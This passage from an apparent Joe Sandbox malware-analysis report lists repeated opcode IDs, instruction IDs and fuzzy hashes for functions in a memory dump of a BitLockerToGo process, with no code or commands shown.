                                                                                                                                                                                        • Instruction Fuzzy Hash: A951D439A00152CFEB08CF68EC6466AB3B2FF8A354F2A4579C805A7355C735DD21CB88
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 094cc9ebf2b94b58a77a7d54baf87293764c3aeed93d30dc14a5af31c842adab
                                                                                                                                                                                        • Instruction ID: 3ef8a3485e4a09ca9123fd3bdb5a29c84306ad2741da8354012a75911fbdc9a7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 094cc9ebf2b94b58a77a7d54baf87293764c3aeed93d30dc14a5af31c842adab
                                                                                                                                                                                        • Instruction Fuzzy Hash: DF514D756183515FD708DF36DC9126EBBD2FBD6308F08993EE4C293392E574850A8B4A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 60c9f6c16bd9daf7dcf07de92bed7ec2e130b78c80c7db28483ecd274fc7c44c
                                                                                                                                                                                        • Instruction ID: 279d7b2eb0a8fcf33c8dcb7f0c65d215301ead192100c4c0499fc11db8e1e484
                                                                                                                                                                                        • Opcode Fuzzy Hash: 60c9f6c16bd9daf7dcf07de92bed7ec2e130b78c80c7db28483ecd274fc7c44c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9851E339A04152CFEB04CF68EC6466AB3B2FF8A354F2A4579D405A7355C735DD22CB88
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 29b770aec6dfd337e65346c3475f8fa8a9074e8de6f262c0b2043a68c75a11d4
                                                                                                                                                                                        • Instruction ID: 228cd8622fa8bfc489c00fd1f6fc7f4016d405ff87da472aa5861001d763d770
                                                                                                                                                                                        • Opcode Fuzzy Hash: 29b770aec6dfd337e65346c3475f8fa8a9074e8de6f262c0b2043a68c75a11d4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C51C0B5A046009FC714EF18C480927B7A1FF89324F154A7EE859AB392E739EC41CF96
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: f2f29e45a297f0d020c3e925ca4051dcc3850d2f384a99105424c8874c3d9e26
                                                                                                                                                                                        • Instruction ID: 50c658e84087e5bd2fd9b5c4ee6627a61c27f6a135d209fb7cb5d54e1aaf484b
                                                                                                                                                                                        • Opcode Fuzzy Hash: f2f29e45a297f0d020c3e925ca4051dcc3850d2f384a99105424c8874c3d9e26
                                                                                                                                                                                        • Instruction Fuzzy Hash: EE411775E083009FD720AF25A940E27F3A2EB89714F29A43EE5895B352D374EC11CB9D
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 0e106eb1173ea1862e037f97892a3d6c5de370f350888938d0229b7b3629f412
                                                                                                                                                                                        • Instruction ID: 60a574b1927e06f973ee1322de91ddd5f815be0c265b9edb6f3a67c7cb1edc19
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e106eb1173ea1862e037f97892a3d6c5de370f350888938d0229b7b3629f412
                                                                                                                                                                                        • Instruction Fuzzy Hash: BC4126727187600BD30CCE7A989026ABAD29BC6310F09CB3EF0A5C73D5D678DA859745
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: c8e2e1791fc48275d03f5d3130ff62834ee4dcc124df446f23d03ca8fabc462e
                                                                                                                                                                                        • Instruction ID: 32ae4797e12eab1b205d30e64d81c5860ce0edace74540fbba17bc4f79a9d616
                                                                                                                                                                                        • Opcode Fuzzy Hash: c8e2e1791fc48275d03f5d3130ff62834ee4dcc124df446f23d03ca8fabc462e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 43319B75B842046BF710AB19DC81B3BB39AEFC8318F04653AF8C597252E639DC25825B
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 8e897fd82ec72377907dd00d318980a70d53f6494a585f5e700c8fee083c478c
                                                                                                                                                                                        • Instruction ID: 350ebd22c4929d93d764c61523a1fbe5fb2502cd1d8c454ed063ec98364ef43a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e897fd82ec72377907dd00d318980a70d53f6494a585f5e700c8fee083c478c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2331B17140835A9AD724DF11C8807AFB7F4AF86304F144C3ED48653290EB78A955CB6A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 673162ba6d375d50d9dc9659cfa29583d419bf2c06ac203f0a5ce742a8ca816e
                                                                                                                                                                                        • Instruction ID: 5839213391cd6851d30cbb42797d8ae624273ee2e20445eb9e3bb11759f1b5c2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 673162ba6d375d50d9dc9659cfa29583d419bf2c06ac203f0a5ce742a8ca816e
                                                                                                                                                                                        • Instruction Fuzzy Hash: E111043BB246354BE750DFBADCC45176342EBC621470A4039EA47F3382C636E821D595
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                        • Instruction ID: 0b60e182974695e82f291e9ab23c88d0fb779e3ea45a278f773647b165bd4164
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                        • Instruction Fuzzy Hash: B111E973A091D40EC7268D3C8800565BFA30A97634F19939AF4F89B3D2D6268D8B8359
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 36cb41210e30e0db0488c0b9bc8dcc56972082b22ac2856e0ffbf0ca560f396d
                                                                                                                                                                                        • Instruction ID: 03bece97555b97dc3f485b073082eda2b04054ac89a4bf728c24fc700a6c2a11
                                                                                                                                                                                        • Opcode Fuzzy Hash: 36cb41210e30e0db0488c0b9bc8dcc56972082b22ac2856e0ffbf0ca560f396d
                                                                                                                                                                                        • Instruction Fuzzy Hash: C10192B5F10B2167E620AF11F8C0B3BA2A89B86708F98453ED40857342EB79FC05869D
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 873b7a95247772dc31e5ae1c420413bd4bea4ddec8833d4bc36669b6062b1270
                                                                                                                                                                                        • Instruction ID: 16a5bd1e6a5ecf6f416ad84edf7b6ca58eef5b7241e4cd85767b0b96f29fecd5
                                                                                                                                                                                        • Opcode Fuzzy Hash: 873b7a95247772dc31e5ae1c420413bd4bea4ddec8833d4bc36669b6062b1270
                                                                                                                                                                                        • Instruction Fuzzy Hash: ABF0373041921386E714CF50C4A5273B3B2FFE6745F25584AE6822B794E3B9992AC34E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 931e92df6a04de479f3c1813266d974a05571062c0c4ca0078d8e6d435bd14da
                                                                                                                                                                                        • Instruction ID: 5bcb3b99a156c0565cb54d318949b250c594c88ab300319b305849b598191ada
                                                                                                                                                                                        • Opcode Fuzzy Hash: 931e92df6a04de479f3c1813266d974a05571062c0c4ca0078d8e6d435bd14da
                                                                                                                                                                                        • Instruction Fuzzy Hash: 64F0ECB1A4422457DB23C955DCC0FB7BB9CCF87754F190416F84597202E17558C4C3E9
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
• API ID: Variant$ClearInit
• String ID: I$Q$S$U$W$Y$[$]$_
• API String ID: 2610073882-2049440583